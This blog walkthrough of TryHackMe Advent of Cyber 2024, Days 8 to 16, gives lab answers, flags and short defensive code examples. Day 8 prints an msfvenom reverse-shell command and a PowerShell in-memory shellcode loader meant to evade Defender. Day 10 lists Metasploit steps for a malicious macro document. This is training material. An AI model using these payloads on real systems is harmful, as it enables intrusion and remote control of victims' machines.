In this post, I will be writing the second part of the TryHackMe Advent of Cyber 2024 Full Walkthrough, starting from Day 7 till the end of the event. You can find the first part at this link.
To get the best out of this post, make sure you follow with the task readings in TryHackMe before checking the answers here.
What is TryHackMe Advent of Cyber 2024
TryHackMe Advent of Cyber 2024 is open to all TryHackMe users, and the best part? It’s completely free to join. Plus, you’ll have the opportunity to win a share of this year’s massive $100,000 prize pool. The more challenges you complete, the greater your chances of scoring big prizes!
It’s like an advent calendar, but instead of chocolates, you’ll enjoy festive and engaging security challenges.
TryHackMe Advent of Cyber Day 8: Shellcodes of the world, unite!
Day 8 Storyline:
Glitch, a skilled but mistrusted hacker, was prepping for a tech conference. He was eager to share his shellcode script that remotely accessed his home system. As he worked, he noticed Mayor Malware’s henchmen lurking nearby.
“They’re wasting their time. I don’t have anything they’d want,” Glitch chuckled.
He didn’t realise that hidden in his home system was something they desperately sought—a research paper he wrote on Wareville’s defences, a treasure Mayor Malware was eager to obtain.
Learning Objectives
- Grasp the fundamentals of writing shellcode
- Generate shellcode for reverse shells
- Execute shellcode with PowerShell
Walkthrough
Essential Terminologies
- Shellcode: A piece of code usually used by malicious actors during exploits like buffer overflow attacks to inject commands into a vulnerable system, often leading to executing arbitrary commands or giving attackers control over a compromised machine. Shellcode is typically written in assembly language and delivered through various techniques, depending on the exploited vulnerability.
- PowerShell: A powerful scripting language and command-line shell built into Windows for task automation and configuration management. It allows users to interact with system components and is widely used by administrators for legitimate purposes. However, attackers often use PowerShell as a post-exploitation tool because of its deep access to system resources and ability to run scripts directly in memory, avoiding disk-based detection mechanisms.
- Windows Defender: A built-in security feature that detects and prevents malicious scripts, including PowerShell-based attacks, by scanning code at runtime. Common bypass methods for evading Defender include obfuscating scripts to disguise malicious content, making it harder for the software to recognise known patterns. Another technique is reflective injection, where malicious code is loaded directly into memory, avoiding detection by signature-based defences. We will cover the latter one in this task.
- Windows API: The Windows Application Programming Interface (API) allows programs to interact with the underlying operating system, giving them access to essential system-level functions such as memory management, file operations, and networking. It serves as a bridge between the application and the operating system, enabling efficient resource handling. The Windows API is crucial because many exploitation techniques and malware rely on it to manipulate processes, allocate memory, and execute shellcodes. Common Windows API functions frequently used by malicious actors include VirtualAlloc, CreateThread, and WaitForSingleObject, which we will also use in this task for exploitation.
- Accessing Windows API through PowerShell Reflection: Accessing the Windows API via PowerShell Reflection is an advanced technique that enables dynamic interaction with the Windows API from PowerShell. Instead of relying on precompiled binaries, PowerShell Reflection allows attackers to call Windows API functions directly at runtime. This enables them to manipulate low-level system processes, making it a primary tool for bypassing security mechanisms, interacting with the operating system, and executing code stealthily.
- Reverse shell: A type of connection in which the target (the machine you’re trying to hack) initiates a connection back to your attacking machine (in this case, your machine will be the AttackBox).
Generating Shellcode
Let’s explore how to create a shellcode to understand its structure. We’ll use a tool called msfvenom to generate a reverse shell.
In the AttackBox, open the terminal and run the following command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell
This command will produce the shellcode for the reverse shell.
The command above generates a piece of shellcode using msfvenom. Here’s a breakdown of each component:
- -p windows/x64/shell_reverse_tcp: The -p option specifies the payload type to create. In this case, windows/x64/shell_reverse_tcp generates a reverse shell payload for a 64-bit Windows system.
- LHOST=ATTACKBOX_IP: This sets the AttackBox's IP address, which the reverse shell will use to establish a connection back to the attacker's system.
- LPORT=1111: This defines the port number on the attacker's machine that will be used to listen for incoming connections from the reverse shell. In this example, port 1111 is used, but it can be any available port, as long as it matches the listener configuration.
- -f powershell: This specifies the output format. Here, the payload is formatted for PowerShell, enabling it to be executed as a script on a Windows machine.
The shellcode referenced in the output above is a hex-encoded byte array, beginning with values like 0xfc, 0xe8, 0x82, and so on. These hexadecimal numbers represent machine instructions that the target system can execute. While computers operate in binary (1s and 0s), hexadecimal serves as a more human-readable representation, making it easier to interpret sequences like 0xfc rather than long binary strings.
To execute this shellcode, we can load it into memory and create a thread to run it. For this example, we will use PowerShell to leverage a few Windows APIs through C# code. Here’s a straightforward PowerShell script to execute the shellcode:
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;
public class VrtAlloc{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@
Add-Type $VrtAlloc
$WaitFor= @"
using System;
using System.Runtime.InteropServices;
public class WaitFor{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $WaitFor
$CrtThread= @"
using System;
using System.Runtime.InteropServices;
public class CrtThread{
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $CrtThread
[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
The script begins by defining several C# classes, which utilize the DllImport attribute to import specific functions from kernel32.dll, a component of the Windows API.
- VirtualAlloc: Allocates memory within the process’s address space. This is often used to prepare memory for storing and running shellcode.
- CreateThread: Initiates a new thread in the process to execute the shellcode loaded into memory.
- WaitForSingleObject: Suspends execution until a designated thread completes its task, ensuring that the shellcode finishes executing.
These classes are then integrated into PowerShell using the Add-Type command, enabling PowerShell to invoke these functions.
Next, the script assigns the shellcode to the $buf variable, storing it as a byte array. In the example provided, SHELLCODE_PLACEHOLDER acts as a marker indicating where you would insert the actual shellcode generated earlier using msfvenom. Typically, this placeholder is replaced with the actual shellcode, represented as a sequence of hexadecimal values. These hex values contain the instructions that will be executed when the shellcode is run.
The script uses the VirtualAlloc function to allocate memory for storing the shellcode. The function is called with the following parameters:
- 0 for the memory address, allowing Windows to select the location for allocation.
- $buf.Length, which specifies the size of the memory block based on the shellcode's length.
- 0x3000 as the allocation type, instructing Windows to reserve and commit the memory.
- 0x40 for memory protection, ensuring the allocated memory is both readable and executable, which is essential for executing the shellcode.
Once memory is allocated, the Marshal.Copy function transfers the shellcode from the $buf array to the allocated memory location ($addr), making it ready for execution.
Once the shellcode is loaded into memory, the script invokes the CreateThread function to execute it by creating a new thread. This thread is configured to begin execution at the memory address where the shellcode resides ($addr). Subsequently, the script calls the WaitForSingleObject function to pause and wait until the shellcode execution completes. This ensures the shellcode finishes running entirely before the script terminates.
TryHackMe Advent of Cyber 2024 Day 8 Answers
What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt.
AOC{GOT _MY_ACCESS_B@CK007}
TryHackMe Advent of Cyber Day 9: Nine o’clock, make GRC fun, tell no one.
Day 9 Storyline
McSkidy and Glitch want to hire an eDiscovery company to process some forensic data for their investigation. They have invited bids from third parties for this purpose. Three companies have bid for the project. McSkidy and Glitch now need to do a risk assessment on all three of these companies to identify the one with the least amount of risk so that they can move forward. All three companies were required to fill out a questionnaire based on which a risk assessment will be done.
Introduction to GRC
Governance, Risk, and Compliance (GRC): A Cornerstone for Organisational Security
GRC is vital for organisations to ensure their security practices are in alignment with personal, regulatory, and legal obligations. While strong security practices inherently reduce the risk of breaches, organisations must also comply with sector-specific external regulations. For instance, the financial sector is governed by numerous security requirements:
- Reserve Bank Regulations: Banks must follow security mandates set by their country’s reserve bank, ensuring a baseline level of security to safeguard customer funds and data.
- SWIFT Customer Security Programme (CSP): After an $81 million SWIFT transfer fraud, SWIFT introduced the CSP to standardise security for banks using its network.
- Data Protection Standards: Given their access to sensitive customer data, banks must comply with data protection standards, often regulated by their country’s reserve bank.
Managing compliance with these regulations across diverse teams can be challenging. This is where GRC comes in, providing a structured approach to interpret external security requirements, translate them into internal policies, and enforce their consistent application across the organisation. GRC helps minimise risks and ensures the organisation meets its security obligations. Below are the three core components of GRC:
1. Governance
Governance involves developing the framework for making security-related decisions. This includes formulating the organisation’s security strategy, policies, standards, and practices to align with its overall objectives. Governance also defines roles and responsibilities to ensure the implementation and maintenance of these standards.
2. Risk
Risk management identifies, assesses, quantifies, and mitigates threats to the organisation’s IT assets. It helps uncover vulnerabilities, evaluate their potential impact, and implement measures to reduce risks to an acceptable level. For instance, simply using IT systems introduces cyber risks. Risk management enables organisations to prepare for and respond to cyber threats, reducing the likelihood and impact of incidents.
3. Compliance
Compliance ensures the organisation meets external legal, regulatory, and industry standards, such as GDPR, NIST, or ISO 27001. This function ensures that the organisation’s security practices align with all required frameworks, safeguarding against non-compliance penalties and enhancing overall security posture.
By integrating these functions, GRC enables organisations to navigate complex security landscapes while mitigating risks and maintaining regulatory adherence.
TryHackMe Advent of Cyber 2024 Day 9 Answers
What does GRC stand for?
Governance, Risk, and Compliance
What is the flag you receive after performing the risk assessment?
THM{R15K_M4N4G3D}
TryHackMe Advent of Cyber Day 10: He had a brain full of macros, and had shells in his soul
TryHackMe Advent of Cyber 2024 Day 10 Storyline
Mayor Malware attempts to phish one of the SOC-mas organizers by sending a document embedded with a malicious macro. Once opened, the macro will execute, giving the Mayor remote access to the organizer’s system.
Marta May Ware is surprised that her system was compromised even after following tight security, but McSkidy believes she has traced the attacker and worked out how he got in. It's none other than Mayor Malware who got into the system. This time, the Mayor used phishing to get his victim. McSkidy's quick incident response prevented significant damage.
In this task, you will run a security assessment against Marta May Ware. The purpose would be to improve her security and raise her cyber security awareness against future attacks.
Glitch is still concerned about any future attack on Marta May Ware and advises McSkidy to run a phishing exercise on her to verify whether she is vigilant about these attacks.
Phishing Attacks
Security is only as strong as its weakest link, and many believe that humans represent that weakest link in the security chain. For example, is it harder to breach a patched system protected by a firewall, or to persuade someone to open an “urgent” document? This makes “human hacking,” a form of social engineering, one of the easiest attack methods to execute.
Phishing, a term derived from “fishing,” doesn’t involve seafood but instead refers to an attacker casting out bait to a large group of users. These messages are often crafted with a sense of urgency, pressuring recipients to act quickly without thinking critically. The goal is typically to steal sensitive information or deploy malware by convincing users to complete actions like filling out a form, clicking a link, or opening a file.
For instance, you might receive an unsolicited email claiming a large charge has been made to your account, prompting you to check an attached file or URL for more details. Once the malicious file is opened or the link is clicked, the attack is activated, potentially giving the attacker control over your system.
Macros
The requirements of MS Office users can vary widely, making it impossible for a default installation to meet everyone’s needs. Some users frequently perform repetitive tasks, such as formatting, inserting text, or conducting calculations. For instance, converting numbers into words—like turning “1337” into “one thousand three hundred thirty-seven”—can be incredibly time-consuming when dealing with large quantities. This highlights the need for an automated solution to save time and minimize manual effort.
In computing, a macro is a set of programmed instructions designed to streamline repetitive tasks. MS Word, along with other MS Office applications, allows users to incorporate macros into documents. These macros often provide significant time-saving benefits. However, in the realm of cybersecurity, such automated tools can be exploited for malicious purposes.
Creating the Malicious Document
The initial step involves embedding a malicious macro into the document. Alternatively, the Metasploit Framework can be used to create such a document, eliminating the need for a system with MS Office installed.
To create the document with the malicious macro using the Metasploit Framework, follow these steps:
- Launch Metasploit Framework: Open a new terminal window and run msfconsole to start the Metasploit Framework.
- Set the Payload: Use the command set payload windows/meterpreter/reverse_tcp to specify the payload, which establishes a reverse shell by connecting to the specified host.
- Select the Module: Use the command use exploit/multi/fileformat/office_word_macro to choose the module for creating a document with an embedded macro. Note that this is technically not an exploit but a module designed for this purpose.
- Configure LHOST: Set the attacker's IP address with the command set LHOST CONNECTION_IP, where CONNECTION_IP represents the IP address of the AttackBox.
- Configure LPORT: Specify the listening port on the AttackBox with the command set LPORT 8888.
- Verify Settings: Use the show options command to review and confirm that the IP address and port number are correctly configured.
- Generate the Document: Execute the exploit command to create a document with the malicious macro embedded.
- Exit: Use the exit command to quit Metasploit and return to the terminal.
This process will create a document with a malicious macro, ready for deployment.
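The module used in the steps above produces a macro-enabled Word document, and the corresponding defensive check is to inspect attachments for a VBA project before they reach a user. The following is an added example (not from the room) that opens an OOXML container, looks for the vbaProject.bin part and for the macroEnabled content type in [Content_Types].xml, and builds two constructed minimal documents to exercise both branches.

```python
import io
import zipfile

# Content type Word assigns to the main part of a macro-enabled document (.docm)
MACRO_ENABLED_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_DOCX_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"


def inspect_office_document(data):
    """Describe an OOXML document's macro indicators.

    Both the vbaProject.bin part and the content-type declaration are checked, so a
    document still alerts when only one of the two is present."""
    findings = {"is_ooxml": False, "has_vba_part": False,
                "macro_enabled_content_type": False, "vba_parts": []}
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            findings["is_ooxml"] = "[Content_Types].xml" in names
            findings["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
            findings["has_vba_part"] = bool(findings["vba_parts"])
            if findings["is_ooxml"]:
                content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
                findings["macro_enabled_content_type"] = MACRO_ENABLED_CT in content_types
    except zipfile.BadZipFile:
        pass  # legacy binary .doc or non-Office data: not handled by this OOXML check
    return findings


def has_macros(data):
    """True when either indicator is present; a mail gateway would quarantine on this."""
    f = inspect_office_document(data)
    return f["has_vba_part"] or f["macro_enabled_content_type"]


def build_sample(with_macro):
    """Construct a minimal OOXML container in memory (sample data, not a real Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        main_ct = MACRO_ENABLED_CT if with_macro else PLAIN_DOCX_CT
        zf.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Only an OLE magic header followed by padding: enough to stand in for a VBA project
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("macro-enabled", build_sample(True)), ("plain", build_sample(False))):
        print(label, "->", "QUARANTINE" if has_macros(doc) else "allow", inspect_office_document(doc))
```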
TryHackMe Advent of Cyber 2024 Day 10 Answers
What is the flag value inside the flag.txt file that's located on the Administrator's desktop?
THM{PHISHING_CHRISTMAS}
TryHackMe Advent of Cyber Day 11: If you’d like to WPA, press the star key!
TryHackMe Advent of Cyber 2024 Day 11 Storyline
The much-awaited SOC-mas of Wareville town is just days away! Glitch, the unsung hero, is closing all the doors to Mayor Malware’s malicious intentions one by one. However, there is still much more to do.
McSkidy took a thoughtful breath. “Mayor can still find his way in!”
Glitch smiles confidently. “I think I know the last technique he relies on to get into the networks.”
McSkidy stands up from her chair with a surge of excitement. “Let me guess, it’s a notorious way to get into a network – a Wi-Fi attack?!”
Glitch nods decisively. “Exactly! Let’s be one step ahead of the Mayor.”
Learning Objectives
- Understand what Wi-Fi is
- Explore its importance for an organisation
- Learn the different Wi-Fi attacks
- Learn about the WPA/WPA2 cracking attack
WiFi Basics
The significance of the Internet in our daily lives is universally understood and requires no explanation. Wi-Fi serves as the technology that connects our devices to this vast global network, the Internet. While the connection between our devices and the Internet may seem entirely wireless, this is only partly true. Our devices connect wirelessly to a router, which serves as a bridge to the Internet, and the router itself is linked to the Internet through a wired connection.
To access Wi-Fi, we activate it on our devices, which then display a list of available Wi-Fi networks in the vicinity. This list consists of access points (usually routers) broadcasting Wi-Fi signals with a unique SSID, or network name. You can connect to any of these networks if you have the correct password, also referred to as a pre-shared key (PSK). Once connected, your device is assigned an IP address within that network, acting as a unique identifier to facilitate communication with other devices. It is similar to becoming part of a family where you are given a trusted, recognizable name.
Most organizations depend on the Internet for their business operations. Connecting all employees to the Internet through wired connections raises concerns regarding cost, efficiency, and workplace flexibility. As a result, many organizations opt for Wi-Fi networks to provide employees with Internet access. When employees connect to the organization’s network, they create a network of interconnected devices that can communicate with one another, enabling them to make and respond to requests seamlessly. To prevent misuse of network privileges, organizations typically hire reliable and professional employees.
Despite these precautions, a malicious outsider can still detect the organization’s broadcasted Wi-Fi SSID when scanning for networks. While this may not appear to be an issue since the attacker doesn’t have the password, they may have other intentions in mind!
WiFi Attacks
Attackers use several techniques to exploit Wi-Fi technology. It’s important to note that the information provided here is strictly for educational purposes. Unauthorized attempts to access or compromise networks are illegal and can result in severe legal consequences. With that in mind, here are some of the most common techniques:
- Evil Twin Attack: In this attack, the attacker creates a counterfeit Wi-Fi access point with a name resembling a trusted one. For instance, if your Wi-Fi is called "Home_Internet," the attacker might set up a fake access point named "Home_Internnet" or something similarly misleading. The attack begins with the attacker sending de-authentication packets to disconnect users from the legitimate network. Frustrated by the repeated disconnections, users might check the available Wi-Fi networks and unknowingly connect to the attacker's fake access point, often attracted by its stronger signal. Once connected, the attacker can monitor the user's internet traffic.
- Rogue Access Point: This attack has a similar goal to the evil twin attack. Here, the attacker sets up an open Wi-Fi access point near or within an organization's premises. Users, especially those whose devices automatically connect to open Wi-Fi networks, may inadvertently join this rogue access point. Once connected, the attacker can intercept and monitor all their communication.
- WPS Attack: Wi-Fi Protected Setup (WPS) simplifies the process of connecting to Wi-Fi networks using an 8-digit PIN instead of a complex password. Unfortunately, this PIN system can be exploited on certain networks due to insecure configurations. Attackers initiate a WPS handshake with the router and capture its response, which contains data related to the PIN. They then use brute-force techniques to extract the PIN and gain access to the Pre-Shared Key (PSK).
- WPA/WPA2 Cracking: Wi-Fi Protected Access (WPA) and its successor WPA2 are designed to secure wireless communication using strong encryption. However, the security depends heavily on the strength of the Pre-Shared Key (PSK). Attackers exploit this by sending de-authentication packets to disconnect a legitimate user from the Wi-Fi network. When the user attempts to reconnect, a 4-way handshake with the router occurs. The attacker, using a device in monitor mode, captures this handshake. The captured data is then subjected to brute-force or dictionary attacks to crack the Wi-Fi password.
Understanding these techniques highlights the importance of implementing strong security measures for Wi-Fi networks to minimize vulnerabilities.
TryHackMe Advent of Cyber 2024 Day 11 Answers
What is the BSSID of our wireless interface?
02:00:00:00:02:00
What is the SSID and BSSID of the access point? Format: SSID, BSSID
MalwareM_AP, 02:00:00:00:00:00
What is the BSSID of the wireless interface that is already connected to the access point?
02:00:00:00:01:00
What is the PSK after performing the WPA cracking attack?
fluffy/champ24
TryHackMe Advent of Cyber Day 12: If I can’t steal their money, I’ll steal their joy!
Day 12 Storyline:
Wareville’s bank had a huge turnover this year and expected a massive profit before the holiday season. They were eager to disclose this news to the town’s people during the SOC-mas celebrations. However, to their surprise, things went the other way around. After completing the annual calculations, the accountants were shocked to see a considerable loss. They observed discrepancies in the account balances.
The bank called McSkidy to help investigate these users' fraudulent transactions. Upon analysing the bank website's transactional logs, McSkidy found some interesting transactions. A few users, including the Mayor's team, initiated multiple transactions from Wareville's reserve accounts at once. Surprisingly, all these transactions succeeded despite exceeding the users' current balance. Glitch was already aware of the critical vulnerability (allowing these fraudulent transactions) that Mayor Malware and his allies exploited.
Learning Objectives
- Understand the concept of race condition vulnerabilities
- Identify the gaps introduced by HTTP/2
- Exploit race conditions in a controlled environment
- Learn how to fix the race
Web Timing and Race Conditions
Conventional web applications are relatively straightforward to understand, analyze, and exploit. If there’s an issue in the application’s code, we can manipulate it into performing unintended actions by sending specific inputs. These vulnerabilities are easier to grasp because there’s often a direct correlation between the input and the output—sending flawed input results in flawed output, clearly indicating a problem. But what if vulnerabilities could be discovered using only valid data? What if the issue lies not in the data itself but in the way it’s delivered? This is where web timing and race condition attacks come into play. Let’s explore this fascinating and often overlooked attack vector!
At its core, a web timing attack involves extracting information from a web application by analyzing how long it takes to process requests. By making subtle adjustments to the data we send or the way we send it, and then measuring the response times, we can uncover unauthorized information.
Race conditions represent a specialized form of web timing attack. These go beyond just accessing sensitive data; they enable attackers to manipulate the application into performing unintended actions on their behalf.
Web timing vulnerabilities can be extremely subtle. Research shows that response time differences ranging from 1300 ms down to 5 ns have been exploited in attacks. Their nuanced nature makes them difficult to detect, often requiring diverse testing techniques. However, with the growing adoption of HTTP/2, identifying and exploiting these vulnerabilities has become somewhat easier.
Timing attacks are often categorized into two primary types:
Information Disclosures
By exploiting differences in response times, an attacker can gain access to information that should remain confidential. For instance, variations in timing can be used to deduce valid usernames in an application, paving the way for password-guessing attempts and unauthorized account access.
Race Conditions
Race conditions, akin to business logic flaws, enable an attacker to trigger unintended actions in an application. However, the underlying issue lies in how the web application handles requests, which creates the opportunity for a race condition. For example, repeatedly submitting the same coupon request simultaneously might allow it to be applied multiple times.
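To make the check-then-act flaw behind the bank's over-withdrawals concrete, here is an added example (not the room's application code) that models a transfer handler twice: a racy version that reads the balance, compares it and writes it back as three separate steps, and a fixed version in which the check and the debit form one critical section. A barrier stands in for several requests arriving inside the race window at once; the account, amounts and request count are constructed.

```python
import threading


class Account:
    """In-memory stand-in for the bank's account row (constructed for this example)."""

    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()


def transfer_racy(account, amount, rendezvous=None):
    """Vulnerable check-then-act: nothing stops another request from reading the same
    stale balance between our read and our write."""
    current = account.balance             # 1. read the balance
    if rendezvous is not None:
        rendezvous.wait()                 # every racer has read before anyone writes
    if current < amount:                  # 2. check against the (now stale) value
        return False
    account.balance = current - amount    # 3. write; each racer writes the same result
    return True


def transfer_safe(account, amount, rendezvous=None):
    """Fixed: check and debit are one atomic step. A SQL backend gets the same effect with
    a single conditional update, e.g.
    UPDATE accounts SET balance = balance - :amt WHERE id = :id AND balance >= :amt
    and treating zero affected rows as a declined transfer."""
    if rendezvous is not None:
        rendezvous.wait()                 # requests still arrive together...
    with account.lock:                    # ...but only one can check-and-debit at a time
        if account.balance < amount:
            return False
        account.balance -= amount
        return True


def fire_concurrently(transfer, starting_balance, amount, requests):
    """Launch `requests` identical transfers simultaneously and return
    (number of transfers that succeeded, final balance)."""
    account = Account(starting_balance)
    barrier = threading.Barrier(requests)
    results = [False] * requests

    def worker(i):
        results[i] = transfer(account, amount, barrier)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), account.balance


if __name__ == "__main__":
    # Five $1000 transfers from a $1000 balance: the racy handler approves all five.
    print("racy:", fire_concurrently(transfer_racy, 1000, 1000, 5))
    print("safe:", fire_concurrently(transfer_safe, 1000, 1000, 5))
```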
TryHackMe Advent of Cyber 2024 Day 12 Answers
What is the flag value after transferring over $2000 from Glitch’s account?
THM{WON_THE_RACE_007}
TryHackMe Advent of Cyber Day 13: It came without buffering! It came without lag!
Day 13 Storyline:
Wares are all about security. The Glitch discovers that an app is illegally tracking the cars in Wareville. Not many car thefts in the city warrant such an extreme measure. He reaches out to McSkidy to investigate and identify how the application is tracking them and leaking users’ positions.
Learning Objectives
- Learn about WebSockets and their vulnerabilities.
- Learn how WebSocket Message Manipulation can be done.
Introduction to WebSocket
WebSockets allow your browser and server to maintain a continuous connection for communication. Unlike the traditional approach of making a request, receiving a response, and disconnecting, WebSockets function like an open phone line, enabling real-time exchanges as needed. Once the connection is established, both the client and server can interact freely without repeated requests.
This makes WebSockets ideal for applications like live chat, real-time gaming, or any service that requires continuous updates. After an initial handshake to establish the connection, either side can send messages anytime, reducing overhead and enabling faster, more efficient data exchange for real-time needs.
Traditional HTTP Requests vs. WebSocket
When you use regular HTTP, your browser sends a request to the server, and the server responds, then closes the connection. If you need new data, you have to make another request. Think of it like knocking on someone’s door every time you want something—they’ll answer, but it can get tiring if you need updates constantly.
Take a chat app as an example. With HTTP, your browser would keep asking, “Any new messages?” every few seconds. This method, known as polling, works but isn’t efficient. Both the browser and the server end up doing a lot of unnecessary work just to stay updated.
WebSockets handle things differently. Once the connection is established, it remains open, allowing the server to push updates to you whenever there’s something new. It’s more like leaving the door open so updates can come in immediately without the constant back-and-forth. This approach is faster and uses fewer resources.
WebSocket Vulnerabilities
While WebSockets can improve performance, they also present security challenges that developers must address. Since WebSocket connections remain open and active, they can be exploited if appropriate security measures are not implemented. Below are some common vulnerabilities:
- Weak Authentication and Authorization: Unlike standard HTTP, WebSockets lack built-in mechanisms for user authentication or session validation. Without proper controls, attackers may gain unauthorized access to sensitive information or manipulate the connection.
- Message Tampering: The continuous data flow in WebSockets creates opportunities for attackers to intercept and alter messages if encryption is not employed. This can lead to malicious command injection, unauthorized actions, or corrupted data exchanges.
- Cross-Site WebSocket Hijacking (CSWSH): This occurs when an attacker deceives a user’s browser into initiating a WebSocket connection with another site. If successful, the attacker can potentially hijack the connection or access data intended for the legitimate server.
- Denial of Service (DoS): WebSocket connections’ persistent nature makes them susceptible to DoS attacks. An attacker could overwhelm the server with excessive messages, leading to performance degradation or a complete server crash.
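The first three weaknesses above are addressed at two points: the Upgrade handshake (Origin allowlist against CSWSH, plus an existing authenticated session, since WebSockets bring no authentication of their own) and every subsequent message (authorising against the server-side session rather than fields the client typed). This added example, not from the room's car-tracking app, shows both checks; the Sec-WebSocket-Accept computation follows RFC 6455, while the origin, session store and the action/userId message fields are assumptions.

```python
import base64
import hashlib
import json

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"   # constant fixed by RFC 6455
ALLOWED_ORIGINS = {"https://cars.example"}          # constructed allowlist for the site's own origin

# Constructed server-side session store: Cookie header value -> authenticated user
SESSIONS = {"sid=abc123": "glitch"}


def lookup_session(cookie_header):
    return SESSIONS.get(cookie_header.strip())


def accept_key(sec_websocket_key):
    """Sec-WebSocket-Accept per RFC 6455 section 4.2.2: base64(SHA-1(key + GUID))."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def validate_handshake(headers, session_lookup=lookup_session):
    """Decide whether an Upgrade request may become a WebSocket.

    `headers` maps lower-cased header names to values. Returns (accepted, accept_or_reason).
    The Origin check stops cross-site WebSocket hijacking; the session check supplies the
    authentication that the protocol itself does not provide."""
    if headers.get("upgrade", "").lower() != "websocket":
        return False, "not a websocket upgrade"
    if headers.get("origin") not in ALLOWED_ORIGINS:
        return False, "origin not allowed"
    key = headers.get("sec-websocket-key")
    if not key:
        return False, "missing Sec-WebSocket-Key"
    if session_lookup(headers.get("cookie", "")) is None:
        return False, "no authenticated session"
    return True, accept_key(key)


def handle_message(session_user, raw):
    """Authorise one client frame against the identity fixed at handshake time."""
    try:
        msg = json.loads(raw)
    except ValueError:
        return {"status": "error", "reason": "malformed"}
    if msg.get("action") != "get_location":
        return {"status": "error", "reason": "unknown action"}
    # The client controls every byte of the frame, so a tampered userId proves nothing;
    # the server-side session decides whose location may be returned.
    if msg.get("userId") != session_user:
        return {"status": "denied", "reason": "userId does not match session"}
    return {"status": "ok", "userId": session_user}


if __name__ == "__main__":
    good = {"upgrade": "websocket", "origin": "https://cars.example",
            "sec-websocket-key": "dGhlIHNhbXBsZSBub25jZQ==", "cookie": "sid=abc123"}
    print(validate_handshake(good))
    print(validate_handshake({**good, "origin": "https://evil.example"}))
    print(handle_message("glitch", '{"action": "get_location", "userId": "mayor"}'))
```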
TryHackMe Advent of Cyber 2024 Day 13 Answers
What is the value of Flag1?
THM{dude_where_is_my_car}
What is the value of Flag2?
THM{my_name_is_malware._mayor_malware}
TryHackMe Advent of Cyber Day 14: Even if we’re horribly mismanaged, there’ll be no sad faces on SOC-mas!
Day 14 Storyline
It’s a quiet morning in the town of Wareville. A wholesome town where cheer and tech come together. McSkidy is charged to protect the GiftScheduler, the service elves use to schedule all the presents to be delivered in Wareville. She assigned Glitch to the case to make sure the site is secure for G-Day (Gift Day). In the meantime, Mayor Malware works tirelessly, hoping to not only ruin Christmas by redirecting presents to the wrong addresses but also to ensure that Glitch is blamed for the attack. After all, Glitch’s warnings about the same vulnerabilities Mayor Malware is exploiting make the hacker an easy scapegoat.
Learning Objectives
- Self-signed certificates
- Man-in-the-middle attacks
- Using Burp Suite proxy to intercept traffic
TryHackMe Advent of Cyber Day 14 Answers
What is the name of the CA that has signed the Gift Scheduler certificate?
THM
Look inside the POST requests in the HTTP history. What is the password for the snowballelf account?
c4rrotn0s3
Use the credentials for any of the elves to authenticate to the Gift Scheduler website. What is the flag shown on the elves’ scheduling page?
THM{AoC-3lf0nth3Sh3lf}
What is the password for Marta May Ware’s account?
H0llyJ0llySOCMAS!
Mayor Malware finally succeeded in his evil intent: with Marta May Ware’s username and password, he can finally access the administrative console for the Gift Scheduler. G-Day is cancelled!
What is the flag shown on the admin page?
THM{AoC-h0wt0ru1nG1ftD4y}
TryHackMe Advent of Cyber Day 15: Be it ever so heinous, there’s no place like Domain Controller.
Day 15 Storyline
Ahead of SOC-mas, the team decided to do a routine security check of one of their Active Directory domain controllers. Upon some quick auditing, the team noticed something was off. Could it be? The domain controller has been breached? With sweat on their brows, the SOC team smashed the glass and hit the panic alarm. There’s only one person who can save us…
Learning Objectives
- Learn about the structures of Active Directory.
- Learn about common Active Directory attacks.
- Investigate a breach against an Active Directory.
Day 15 Storyline Answers
On what day was Glitch_Malware last logged in?
Answer format: DD/MM/YYYY
07/11/2024
What event ID shows the login of the Glitch_Malware user?
4624
Read the PowerShell history of the Administrator account. What was the command that was used to enumerate Active Directory users?
Get-ADUser -Filter * -Properties MemberOf | Select-Object Name
Look in the PowerShell log file located in Application and Services Logs -> Windows PowerShell. What was Glitch_Malware’s set password?
SuperSecretP@ssw0rd!
Review the Group Policy Objects present on the machine. What is the name of the installed GPO?
Malicious GPO – Glitch_Malware Persistence
TryHackMe Advent of Cyber Day 16: The Wareville’s Key Vault grew three sizes that day
